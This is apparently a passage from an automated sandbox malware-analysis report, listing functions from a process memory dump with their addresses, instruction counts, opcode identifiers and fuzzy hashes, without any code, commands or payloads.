              • Opcode Fuzzy Hash: bfb4cff41621ffe8aae57ad0bbeff17800c0c429e1826bdab7f531d005a7f352
              • Instruction Fuzzy Hash: 59D13B30F1A65D9FDB68DB98C460ABCBBB1FF59315F154079D00EA32A1CB396941CB41
              Function 00007FFD9B9E1718 Relevance: .3, Instructions: 285COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de8f35e5d51839bfa378a1d16be03ab29c56be448fe8abf53f29dc8b59d0c7fd
              • Instruction ID: eaf36449e7eb635433c83cbe0d669542f4aaea6e12c310582fa8a8031093e40e
              • Opcode Fuzzy Hash: de8f35e5d51839bfa378a1d16be03ab29c56be448fe8abf53f29dc8b59d0c7fd
              • Instruction Fuzzy Hash: D381E131B2DA594FDB58DE5C88A15A977E2FFD8304B15057EE45EC32A2DE30AE02C781
              Function 00007FFD9B9E1CED Relevance: .2, Instructions: 190COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 85a0466b97c5331fd9a180275150449143034b7ee43ba8fd89a8ba510cac17d6
              • Instruction ID: 2d246d899fbf034f2d8f76a834db5aace6ae1c6bab2c31e1d7a2541205fd3d69
              • Opcode Fuzzy Hash: 85a0466b97c5331fd9a180275150449143034b7ee43ba8fd89a8ba510cac17d6
              • Instruction Fuzzy Hash: 2A51FE31B18A994FDB5CDE5888A45AA77E2FFD8304B15417EE45EC3292CE30EE428781
              Function 00007FFD9B9ECE55 Relevance: .2, Instructions: 161COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 502f8e6f222aa570f492869ae89b9703e591aca162ed3bbae45740ee7653dff6
              • Instruction ID: df765b0fed33ef7620e6d15dec8c4251e1c1f69a5f4e90791bf4346892fc2464
              • Opcode Fuzzy Hash: 502f8e6f222aa570f492869ae89b9703e591aca162ed3bbae45740ee7653dff6
              • Instruction Fuzzy Hash: 4F411823B1D62B5AE72677ACB4648FD77A0DF40371B060577E99ECD0D3CE293A498290
              Function 00007FFD9B9E3185 Relevance: .1, Instructions: 145COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 691121749e3d1aa2e3f9e7c669dceaf30bf96744c310758107591f8bd0f1015d
              • Instruction ID: 3e839977cffe63e2ce5a60b8287ec38a6526af437af3a1303297539849f69628
              • Opcode Fuzzy Hash: 691121749e3d1aa2e3f9e7c669dceaf30bf96744c310758107591f8bd0f1015d
              • Instruction Fuzzy Hash: 26515C70E1A50D9FEB65EB98C464AEDB7F1FF58301F41407AD009E72A1DA386A44CB40
              Function 00007FFD9B9EC7C4 Relevance: .1, Instructions: 109COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9eb1010cac440cc28239451cb9242133e54640d5ee6d0332a0beed74d60bb358
              • Instruction ID: 72660add35e649e504a7764f5fbb0fc88789d0d372887de697e9fd2a99fdc5f0
              • Opcode Fuzzy Hash: 9eb1010cac440cc28239451cb9242133e54640d5ee6d0332a0beed74d60bb358
              • Instruction Fuzzy Hash: CE310C71E2991DAEDBA4EB98D8A56FCB7B1FF58300F51103AD04DE3292DE246A418B40
              Function 00007FFD9B9EB6DD Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc6d638366d67c77977ff11dbebb6078fa68ae3468b7fbeaeacb9717208f5219
              • Instruction ID: 135e0bca0e212e82b5c9c7b621ec5a904147d5ccee6b21f51cef5d7697f3838c
              • Opcode Fuzzy Hash: fc6d638366d67c77977ff11dbebb6078fa68ae3468b7fbeaeacb9717208f5219
              • Instruction Fuzzy Hash: 5C316F70E1961E9EEB61DBA4C8A47ED77F1FF58300F0541B6C04AA32A1DB386B84CB50
              Function 00007FFD9B9EBD78 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac9df3abfc3fe8282118fe435e6cc26cd3b4508147e3054198a419c69d9492ac
              • Instruction ID: 1a4ffe10f544b7c80aa39648a05aa36cb2078b859b9e6db5aebc628637af8a37
              • Opcode Fuzzy Hash: ac9df3abfc3fe8282118fe435e6cc26cd3b4508147e3054198a419c69d9492ac
              • Instruction Fuzzy Hash: 5A31EA70E2A51E9AEBA5EB54C8A56E8B7B1EF58300F0101F9D51DD32A1DE346B858F40
              Function 00007FFD9B9EB801 Relevance: .1, Instructions: 82COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a14cdfb551836c787c536daffc62c17b9780b5f3300177475bd178987a7fed4d
              • Instruction ID: 7ecc515d02809e21925373cdfe06864364ef4aacb25d935d311f36a67d68cb89
              • Opcode Fuzzy Hash: a14cdfb551836c787c536daffc62c17b9780b5f3300177475bd178987a7fed4d
              • Instruction Fuzzy Hash: 2F214F71E1951E9BDF68DB54C4947EDB3A1FB68300F1042BAD01ED2295DE34AE85CB40
              Function 00007FFD9B9EC9A0 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e5b903f351f6e49cce2ccfdb5205adc10b35daef4346758eab859c09b8225ab
              • Instruction ID: 3e89d71bd04070066f60f3eca929156a6fd69f2baf23ba29e93498df4b96ebda
              • Opcode Fuzzy Hash: 1e5b903f351f6e49cce2ccfdb5205adc10b35daef4346758eab859c09b8225ab
              • Instruction Fuzzy Hash: 4C21B07199E2CA1FD7169B705C265F63FB0AF03214F1A01EBE498CA4A3DA2C5656C352
              Function 00007FFD9B9E32B8 Relevance: .1, Instructions: 78COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed42d6e37db0c16f7269d871fcfbf30d6ec4f36642357a50d41bb4848dd0d9f8
              • Instruction ID: 6bd0789db124bb9c5583019bdd49b1c42d4623e00b470634902e708ff0dd3ca9
              • Opcode Fuzzy Hash: ed42d6e37db0c16f7269d871fcfbf30d6ec4f36642357a50d41bb4848dd0d9f8
              • Instruction Fuzzy Hash: 33213975E1851D9FEB64EF98C4A4AECB7F1FF98301F51407AC00AE72A1CA356A40CB00
              Function 00007FFD9B9E3380 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4f63614e251fb4146282b2397239c2364984114914b3696acd4255dc7d3f099
              • Instruction ID: 174bb022f5ae3b76e00444ddd7341153bc8f4b4418b5dccbb01ddacec232d3bc
              • Opcode Fuzzy Hash: e4f63614e251fb4146282b2397239c2364984114914b3696acd4255dc7d3f099
              • Instruction Fuzzy Hash: 6921933095E68D9FD753ABB4C8689A57FF0EF57300B0544EAD445C7062DA289646C711
              Function 00007FFD9B9E2189 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ffb514e2f565beda655c1b89f42fdd44fe015dd216fb5846ba4e70fd24a29a4b
              • Instruction ID: 4db95c2f01c1cba7808c0a0da3b63ce5aafa16ba2aec98b15d1e97d377b96800
              • Opcode Fuzzy Hash: ffb514e2f565beda655c1b89f42fdd44fe015dd216fb5846ba4e70fd24a29a4b
              • Instruction Fuzzy Hash: 5C11E130B2E54E5FE755EBB884695B97BE0EF06300F0544F6E41DC70A7DE28A7858701
              Function 00007FFD9B9EBE41 Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b9497fb207e6c4b424173bc5c61779f0b57be560f90cae61e6283ba8fd5fcd4e
              • Instruction ID: 449108e773b1c32cb1057deb58e4d41bc5dddb622375a8b6f171709ebe94b954
              • Opcode Fuzzy Hash: b9497fb207e6c4b424173bc5c61779f0b57be560f90cae61e6283ba8fd5fcd4e
              • Instruction Fuzzy Hash: 8921FF30E2591D5EEBA4EB54C8657E9B7B1EF48300F0145F5954DE32A6CE346F818F40
              Function 00007FFD9B9E3421 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ad7cf712dd3653b787aaf1dad1db46a1625c0bafd20c2b4a8e8b3929c7495da
              • Instruction ID: 589435714b32988fe55909f9a1a1a3b77bcdf280fcf186a77dabe4ef9b0f772b
              • Opcode Fuzzy Hash: 0ad7cf712dd3653b787aaf1dad1db46a1625c0bafd20c2b4a8e8b3929c7495da
              • Instruction Fuzzy Hash: A9117230A1E64E9FEB66EF64C8685BE77A0FF14304F0105BAD419C71A1EF35A600CB50
              Function 00007FFD9B9E084D Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 646cb4faf3dd9c170d593af651c59fcc2ddc1fc93684391beec00747a5c8d6f7
              • Instruction ID: 9075d765e0ef528ccc572c096f9f1117349aef0109d97d904affed5f2d14dd80
              • Opcode Fuzzy Hash: 646cb4faf3dd9c170d593af651c59fcc2ddc1fc93684391beec00747a5c8d6f7
              • Instruction Fuzzy Hash: B4117A31A1E14EAFEB50A7B8C86A1E837E0FF14304F0604B3C099C70A7ED30A640C281
              Function 00007FFD9B9E0A01 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a29b8f81b32298fdc318751e90d9b41974b73f155df5560c273ab436e6091d4
              • Instruction ID: b7242ea1639298aea885a4fc01b52b920ffcb1116df203f633e24df795f3158d
              • Opcode Fuzzy Hash: 4a29b8f81b32298fdc318751e90d9b41974b73f155df5560c273ab436e6091d4
              • Instruction Fuzzy Hash: CD11C430E1A50E5FE790EBA8C85E5BD77E1FF58700F4605B6D459C70A6EE34A6448740
              Function 00007FFD9B9E112D Relevance: .1, Instructions: 62COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cdf94d5d09754aa083857e60b3a85a4272f9fbd1bb263067a0c8335d3233a62
              • Instruction ID: 436c62ee327711cba86bf78078fbad8fb9e9d3bf3425a5836c669123ca30c22b
              • Opcode Fuzzy Hash: 7cdf94d5d09754aa083857e60b3a85a4272f9fbd1bb263067a0c8335d3233a62
              • Instruction Fuzzy Hash: EF11E670A1A65E5EEB65EBA4C4647B97BF0FF55304F0144BEE40AC60E2DE256640C700
              Function 00007FFD9B9EB22D Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a82748fbed6281985856c0d130af7522c7d0191b3c585424a3f72fdca6c34be5
              • Instruction ID: d5d0efbcf94fe92a99ae7d976b0337c640ddbe7b20eef2bac837de26034978fc
              • Opcode Fuzzy Hash: a82748fbed6281985856c0d130af7522c7d0191b3c585424a3f72fdca6c34be5
              • Instruction Fuzzy Hash: 43118830A1961E9FDB58EF68C4596BE7BE0FF58308F10057AE81AD31A4CB74A6408A81
              Function 00007FFD9B9E3515 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1bb46a068a5284d083a8eb1f40c614344d1742eb545037e08542cfee926f036
              • Instruction ID: 3edbae5ac22bdb8ed4fdaa71277dfc86d1c339cab169e70afbd9ac073ffb988b
              • Opcode Fuzzy Hash: d1bb46a068a5284d083a8eb1f40c614344d1742eb545037e08542cfee926f036
              • Instruction Fuzzy Hash: 9E115270A1A64E9FDB55EFA8C8696BE7BB0FF18300F4504BED41DC65A1DF35A6408700
              Function 00007FFD9B9EC2B5 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af47ac31e90754cec95dee0796e60e874c33f0420c6d0b950800cc3d2698e899
              • Instruction ID: a6a1deb3775fb71398de9ea2c8e0b1bdeeb02e79c0eba674cbb7d6c255ed6cb7
              • Opcode Fuzzy Hash: af47ac31e90754cec95dee0796e60e874c33f0420c6d0b950800cc3d2698e899
              • Instruction Fuzzy Hash: 9F118E30A1964E9FDB54EBA8C4692BE7BF0FF18300F0204BED45AD22A5DB35A640C700
              Function 00007FFD9B9E2E81 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 66960bfa37217f09acdb43ed817af8c38c1477f75851627160a57872c162ed06
              • Instruction ID: 6d4ed0132c9b63834c0125cc749306c271f1cc28b4a0cebb55fe4cff8b15f05d
              • Opcode Fuzzy Hash: 66960bfa37217f09acdb43ed817af8c38c1477f75851627160a57872c162ed06
              • Instruction Fuzzy Hash: B0018430A2E65E5FE761EBB4C8695A97FE0FF59300F0645BAD408C70A6EF34E6848700
              Function 00007FFD9B9EAF09 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fbdd748e6fec3f10a51271d4bf6a2490b81438b98e301e39ba199b07a69a809
              • Instruction ID: be8e1d656fc71314d42d43ec912ba507d195983ee9c9745c7333f2b97c8dd94b
              • Opcode Fuzzy Hash: 7fbdd748e6fec3f10a51271d4bf6a2490b81438b98e301e39ba199b07a69a809
              • Instruction Fuzzy Hash: 7701C47091A78D5FDB55AB64C4691B93BB0FF15300F1608FFD40ACA0F2DA25A640C701
              Function 00007FFD9B9EB1E8 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 35860555e9e40082f27733ba1b3aa697fd31faece923ed296530184748807ce4
              • Instruction ID: d9914115372b74d21a0887015de0fd6288594b7e4833d48a8f785b82fcf221fe
              • Opcode Fuzzy Hash: 35860555e9e40082f27733ba1b3aa697fd31faece923ed296530184748807ce4
              • Instruction Fuzzy Hash: 11116130E14A1E9FEB94EF68C4546BE77E1FF58305F10497AE419C21A9DB34A2948780
              Function 00007FFD9B9EB400 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee871369beb968d3e4c91ca73fb8de1f30a68a9b01e4a43c30a26dcfc7250366
              • Instruction ID: 87366d77ba611b05f327122eed2842846c35b0c16ff8ef849921698f2d08095f
              • Opcode Fuzzy Hash: ee871369beb968d3e4c91ca73fb8de1f30a68a9b01e4a43c30a26dcfc7250366
              • Instruction Fuzzy Hash: 43015E30A2550E9FEB58EFA8C8696BE77F0FF18304F11087AE46EC21A4DE306650C700
              Function 00007FFD9B9EB448 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 343726c48a69b47ab4d6470c40f8d3d09a5cd04fd82cfea7f677fb02ac256385
              • Instruction ID: 4c1b08272cf91dc80f203dc65442a31babd7244fd31ad4ee4444552c1b953e3c
              • Opcode Fuzzy Hash: 343726c48a69b47ab4d6470c40f8d3d09a5cd04fd82cfea7f677fb02ac256385
              • Instruction Fuzzy Hash: 3A014030A2550E9BDB54EF64C4686BE7BB0FF18304F11147AD46AD21A0DF346650C600
              Function 00007FFD9B9E285D Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d76e35584b2441788fd314b7862d5333fa0febdeb9c797ff48f904cb78de07e8
              • Instruction ID: 79f1442b7fa83ed2367dde7acc166e080f820c96fb197da271db08c19a3d463c
              • Opcode Fuzzy Hash: d76e35584b2441788fd314b7862d5333fa0febdeb9c797ff48f904cb78de07e8
              • Instruction Fuzzy Hash: 9501A730A2A54E9FE761EBA4C4695B97BF0FF19300F4645B6D458C60A5DE34E644C700
              Function 00007FFD9B9EB408 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfdca579e3c96fec6fbe4aa347d9461e2fbe613e4fcb66b62e13cdd9040bbd8b
              • Instruction ID: 9612aa79f19c1c064c8f8efcbd92f1958ffc3170cbfb5987a4468c55deabe627
              • Opcode Fuzzy Hash: bfdca579e3c96fec6fbe4aa347d9461e2fbe613e4fcb66b62e13cdd9040bbd8b
              • Instruction Fuzzy Hash: 05017130A1950E9FDB58EF64C4656BA37A1FF58305F52047EE45ED21A4CA35A350C740
              Function 00007FFD9B9E2EF9 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b3aed13ee035a49d802e4ee2ddb8510bd3e23acefb37c6cc9c3cf88ac2839aeb
              • Instruction ID: fd4e4bbeba7bb72368d013d6cfbb2a495ecfdaa106c5bdcb4ff2dbf3aa82444f
              • Opcode Fuzzy Hash: b3aed13ee035a49d802e4ee2ddb8510bd3e23acefb37c6cc9c3cf88ac2839aeb
              • Instruction Fuzzy Hash: CD018430A2A64E9FD752A7B488695A97BE0EF09300F1609B7D418CB0B6DA38A654C701
              Function 00007FFD9B9E05D8 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dcde475e63685f839a6e4080256c320173f404ff0ac9623d3ba5e8034e997792
              • Instruction ID: aa290b779252ed679099123227f95a45384748421e39375d3f12d33b103b9537
              • Opcode Fuzzy Hash: dcde475e63685f839a6e4080256c320173f404ff0ac9623d3ba5e8034e997792
              • Instruction Fuzzy Hash: 2B01A230A1991E9FDBA8EF64C0646BE77E1FF58308F21047ED40EC21A0CA31A790CB40
              Function 00007FFD9B9EB069 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 788598d883a30b37cd6067fe3a34621dafe31b2d0f385a6a60c2dffc1ff996b8
              • Instruction ID: 6ec03443e22a406de1f05b827f3cf002237055273b5293442f8adf148ea7382b
              • Opcode Fuzzy Hash: 788598d883a30b37cd6067fe3a34621dafe31b2d0f385a6a60c2dffc1ff996b8
              • Instruction Fuzzy Hash: 6101B530A5E64E5FD761EB7484E91A97BE0EF16301F0608F6D059C70B6DE24B6448701
              Function 00007FFD9B9E1C6D Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8ec6408b9f9cb025834dc1e81bbfc5e9a75eae6420ee2cc0543531a2d8f78b62
              • Instruction ID: 1009cfd21f492e62558513ffe51e555feccbe38207a5eba07874b87331f56679
              • Opcode Fuzzy Hash: 8ec6408b9f9cb025834dc1e81bbfc5e9a75eae6420ee2cc0543531a2d8f78b62
              • Instruction Fuzzy Hash: 0A01F430A0A65E9FEBA9DF24C8656FA3BB0FF55304F5100BAE80DC21A1CB35D690C740
              Function 00007FFD9B9EC691 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62f8cf4afcbc5b40be4da3d61eded65f7b5ab267b3bafc56d9dc79b8177de89a
              • Instruction ID: 4f9952e3f10462465015bfff2cecdbd571b4b3479f2c7031c92d15c21b1e51ee
              • Opcode Fuzzy Hash: 62f8cf4afcbc5b40be4da3d61eded65f7b5ab267b3bafc56d9dc79b8177de89a
              • Instruction Fuzzy Hash: 48F08131A2A68F9FEB94EF6488292FE7FB0FF19300F41157AE859C21A1DB7497508741
              Function 00007FFD9B9E0608 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b0eb788c8803cd3ad10fecd99b8bbe7c0344d3ab6ed60d1c8fb3c6a0f0f90ee6
              • Instruction ID: 456e483cf70b0e72bc0ebbd563f5f8f89dd2b615a90e6ff9fdb6a11f22a588c3
              • Opcode Fuzzy Hash: b0eb788c8803cd3ad10fecd99b8bbe7c0344d3ab6ed60d1c8fb3c6a0f0f90ee6
